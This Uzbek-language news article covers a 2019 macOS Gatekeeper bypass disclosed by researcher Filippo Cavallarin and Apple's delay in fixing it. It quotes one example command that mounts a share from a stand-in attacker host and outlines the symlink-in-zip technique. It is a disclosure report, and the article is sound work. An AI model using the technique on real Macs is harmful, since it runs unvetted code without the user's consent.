Zararli dasturni Mac-ga o'rnatish oson. Apple uch oydan keyin ham xatoni tuzatmadi

27. 5. 2019

Xavfsizlik bo‘yicha tadqiqotchi Filippo Kavallarin o‘z blogida macOS 10.14.5’dagi xato haqida ogohlantirishni joylashtirdi. Bu Gatekeeperning xavfsizlik choralarini butunlay chetlab o'tish imkoniyatidan iborat. Kavallarinning so‘zlariga ko‘ra, u Apple’ga xatoni shu yilning fevral oyidayoq ta’kidlagan, biroq kompaniya uni so‘nggi yangilashda tuzatmagan.

Gatekeeper Apple tomonidan ishlab chiqilgan va uning ish stoli operatsion tizimiga birinchi marta 2012-yilda kiritilgan. Bu dastur foydalanuvchining bilimi va roziligisiz ishlashini oldini oluvchi mexanizmdir. Ilovani yuklab olganingizdan so'ng, Gatekeeper dasturiy ta'minot Apple tomonidan to'g'ri imzolanganligini tekshirish uchun avtomatik ravishda uning kodini tekshiradi.

Kavallarin o'zining blog postida Gatekeeper sukut bo'yicha tashqi xotirani ham, tarmoq ulushlarini ham xavfsiz joy deb hisoblaydi. Shunday qilib, ushbu maqsadlarda joylashgan har qanday dastur Gatekeeper tekshiruvidan o'tmasdan avtomatik ravishda ishga tushirilishi mumkin. Aynan shu xususiyatdan foydalanuvchining xabarisiz zararli dasturlarni ishga tushirish uchun foydalanish mumkin.

Ruxsatsiz kirishga ruxsat beruvchi jihatlardan biri bu avtomatik o'rnatish xususiyati bo'lib, u foydalanuvchilarga "/net/" bilan boshlanadigan yo'lni belgilash orqali tarmoq ulushini avtomatik ravishda o'rnatish imkonini beradi. Misol sifatida, Cavallarin "ls /net/evil-attacker.com/sharedfolder/" yo'lini keltiradi, bu esa operatsion tizimning zararli bo'lishi mumkin bo'lgan "sharefolder" jildining mazmunini uzoq joyda yuklanishiga olib kelishi mumkin.

Videoda tahdid qanday ishlashini ko'rishingiz mumkin:

Yana bir omil shundaki, agar automount funksiyasiga olib boradigan ma'lum bir symlinkni o'z ichiga olgan zip arxivi umumiy bo'lsa, u Gatekeeper tomonidan tekshirilmaydi. Shunday qilib, jabrlanuvchi zararli arxivni osongina yuklab olishi va uni ochishi mumkin, bu esa tajovuzkorga foydalanuvchining xabarisiz Mac-da deyarli har qanday dasturiy ta'minotni ishga tushirishga imkon beradi. Sukut bo'yicha ma'lum kengaytmalarni yashiradigan Finder ham ushbu zaiflikdan o'z ulushiga ega.

Kavallarin o‘z blogida ma’lum qilishicha, Apple joriy yilning 22 fevralida macOS operatsion tizimining zaifligiga e’tibor qaratgan. Ammo may oyining o'rtalarida Apple Cavallarin bilan aloqani to'xtatdi, shuning uchun Kavallarin hamma narsani ommaga etkazishga qaror qildi.

Manba: FCVL

Mavzular: saqlash, avtomatik ravishda, MacOS, video, Sozlamalar, funktsiyasi, foydalanuvchi, Ilova, olma

Maqolani muhokama qilish

Ismingiz

Sizning fikringiz

Yuqoridagi ma'lumotlarni to'ldirib, men TEXT FACTORY s.r.o. kompaniyasining Brno shahrida ro'yxatdan o'tgan ofisini, Durďákova 336/29, Černá Pole, pochta indeksi: 613 00, ID raqami: 06157831, Brno viloyat sudida ro'yxatdan o'tganligini tan olaman. , 100399 raqamini kiriting, 6-moddaning 1-bandiga binoan TEXT FACTORY s.r.o. qonuniy manfaatlari asosida men tomonidan to'ldirilgan ro'yxatga olish shaklida taqdim etilgan shaxsiy ma'lumotlarimni qayta ishlaydi. f) GDPR va qonuniy majburiyatlarni bajarish (6-modda, 1-band, c) GDPR), quyidagi maqsadlarda: TEXT FACTORY s.r.o. tomonidan boshqariladigan veb-saytlarga tashrif buyuruvchilarning nashr etilgan maqolalarga yoki muhokamalarga faol hissa qo'shishiga ruxsat berish zarurati. forumlar va ushbu muhokama forumlari ma'muri sifatida TEXT FACTORY s.r.o. huquqlaridan foydalanish. Shaxsiy ma'lumotlar va huquqlarni qayta ishlash haqida ko'proq ma'lumotni quyidagi havolada topishingiz mumkin Shaxsiy ma'lumotlarni himoya qilish bo'yicha darslar. butun matn

Bo'lishi mumkin sizni qiziqtiradi

Bog'liq